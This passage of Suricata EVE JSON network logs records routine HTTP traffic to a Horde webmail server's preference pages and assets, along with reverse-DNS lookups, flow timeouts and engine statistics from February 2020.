Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":5}} {"timestamp":"2020-02-29T00:25:24.271143+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34990,"proto":"UDP","dns":{"type":"answer","id":56920,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:24.271143+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34990,"proto":"UDP","dns":{"type":"answer","id":56920,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:24.383397+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5316}} {"timestamp":"2020-02-29T00:25:24.444426+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5316},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":6}} {"timestamp":"2020-02-29T00:25:24.446802+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:25:26.838842+0000","flow_id":1291220436495971,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53136,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":0}} {"timestamp":"2020-02-29T00:25:26.839002+0000","flow_id":1482449560383490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53138,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:29.451829+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":7}} {"timestamp":"2020-02-29T00:25:31.000257+0000","event_type":"stats","stats":{"uptime":15183,"capture":{"kernel_packets":141589,"kernel_drops":0},"decoder":{"pkts":141593,"bytes":97251200,"invalid":195,"ipv4":140006,"ipv6":10,"ethernet":141593,"raw":0,"null":0,"sll":0,"tcp":134432,"udp":5364,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2906,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2922,"synack":2913,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1914,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2453,"failed_udp":116},"tx":{"http":4973,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2537}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2534,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":11227,"memcap_state":0,"memcap_global":0},"http":{"memuse":1280,"memcap":0}}} {"timestamp":"2020-02-29T00:25:32.000516+0000","flow_id":210589465948869,"event_type":"flow","src_ip":"192.168.10.122","src_port":35430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:31.635589+0000","end":"2020-02-29T00:20:31.746740+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:32.001504+0000","flow_id":2045171861543121,"event_type":"flow","src_ip":"192.168.10.122","src_port":49402,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:31.841937+0000","end":"2020-02-29T00:20:31.950688+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:33.660270+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14725,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:33.768730+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":14725,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:33.768730+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":14725,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:33.933068+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:25:33.951123+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413}} {"timestamp":"2020-02-29T00:25:34.000675+0000","flow_id":1239998652620537,"event_type":"flow","src_ip":"192.168.10.130","src_port":34284,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":30,"pkts_toclient":63,"bytes_toserver":3393,"bytes_toclient":80771,"start":"2020-02-29T00:24:22.597753+0000","end":"2020-02-29T00:24:27.642179+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:38.000187+0000","event_type":"stats","stats":{"uptime":15190,"capture":{"kernel_packets":141593,"kernel_drops":0},"decoder":{"pkts":141609,"bytes":97258964,"invalid":195,"ipv4":140022,"ipv6":10,"ethernet":141609,"raw":0,"null":0,"sll":0,"tcp":134446,"udp":5366,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2907,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2923,"synack":2914,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1915,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2454,"failed_udp":116},"tx":{"http":4974,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2538}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2536,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10896,"memcap_state":0,"memcap_global":0},"http":{"memuse":57324,"memcap":0}}} {"timestamp":"2020-02-29T00:25:38.952006+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53140,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:39.452593+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36372,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2574,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:39.560672+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36372,"proto":"UDP","dns":{"type":"answer","id":2574,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:39.560672+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36372,"proto":"UDP","dns":{"type":"answer","id":2574,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:39.686533+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:25:39.701713+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413}} {"timestamp":"2020-02-29T00:25:40.001334+0000","flow_id":473329795826713,"event_type":"flow","src_ip":"192.168.10.122","src_port":54649,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:39.164889+0000","end":"2020-02-29T00:20:39.276286+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:42.000607+0000","flow_id":1649433575501601,"event_type":"flow","src_ip":"192.168.10.122","src_port":37012,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:41.470817+0000","end":"2020-02-29T00:20:41.579975+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:42.000814+0000","flow_id":1825376910826116,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"158.69.60.196","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:20:41.449156+0000","end":"2020-02-29T00:20:41.556671+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:44.702897+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53146,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:45.000180+0000","event_type":"stats","stats":{"uptime":15197,"capture":{"kernel_packets":141617,"kernel_drops":0},"decoder":{"pkts":141630,"bytes":97266988,"invalid":195,"ipv4":140041,"ipv6":10,"ethernet":141630,"raw":0,"null":0,"sll":0,"tcp":134463,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2539,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10565,"memcap_state":0,"memcap_global":0},"http":{"memuse":1440,"memcap":0}}} {"timestamp":"2020-02-29T00:25:48.000875+0000","flow_id":193285043724562,"event_type":"flow","src_ip":"192.168.10.122","src_port":49212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:47.794898+0000","end":"2020-02-29T00:20:47.903724+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:49.000616+0000","flow_id":934914226655249,"event_type":"flow","src_ip":"192.168.10.122","src_port":58554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:48.266257+0000","end":"2020-02-29T00:20:48.377643+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:52.000234+0000","event_type":"stats","stats":{"uptime":15204,"capture":{"kernel_packets":141630,"kernel_drops":0},"decoder":{"pkts":141633,"bytes":97267186,"invalid":195,"ipv4":140044,"ipv6":10,"ethernet":141633,"raw":0,"null":0,"sll":0,"tcp":134466,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091008},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2541,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":9903,"memcap_state":0,"memcap_global":0},"http":{"memuse":1440,"memcap":0}}} {"timestamp":"2020-02-29T00:25:54.000228+0000","flow_id":25411967806218,"event_type":"flow","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":39,"pkts_toclient":40,"bytes_toserver":3793,"bytes_toclient":50594,"start":"2020-02-29T00:24:48.420618+0000","end":"2020-02-29T00:24:53.581992+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000411+0000","flow_id":1027445017833512,"event_type":"flow","src_ip":"192.168.10.81","src_port":53118,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":751,"bytes_toclient":952,"start":"2020-02-29T00:24:48.421928+0000","end":"2020-02-29T00:24:53.434933+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000480+0000","flow_id":2058924363639521,"event_type":"flow","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1768,"bytes_toclient":4862,"start":"2020-02-29T00:24:48.420577+0000","end":"2020-02-29T00:24:53.435236+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000543+0000","flow_id":2226118850538449,"event_type":"flow","src_ip":"192.168.10.81","src_port":53114,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":813,"bytes_toclient":2976,"start":"2020-02-29T00:24:48.420817+0000","end":"2020-02-29T00:24:53.435205+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000636+0000","flow_id":404301097748814,"event_type":"flow","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":1678,"bytes_toclient":13190,"start":"2020-02-29T00:24:48.280910+0000","end":"2020-02-29T00:24:53.435437+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000693+0000","flow_id":1391374776691898,"event_type":"flow","src_ip":"192.168.10.81","src_port":53116,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":813,"bytes_toclient":1857,"start":"2020-02-29T00:24:48.421050+0000","end":"2020-02-29T00:24:53.434966+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:56.000823+0000","flow_id":1792692210569469,"event_type":"flow","src_ip":"192.168.10.122","src_port":45056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:55.135421+0000","end":"2020-02-29T00:20:55.246785+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:59.000150+0000","event_type":"stats","stats":{"uptime":15211,"capture":{"kernel_packets":141630,"kernel_drops":0},"decoder":{"pkts":141633,"bytes":97267186,"invalid":195,"ipv4":140044,"ipv6":10,"ethernet":141633,"raw":0,"null":0,"sll":0,"tcp":134466,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2880,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} 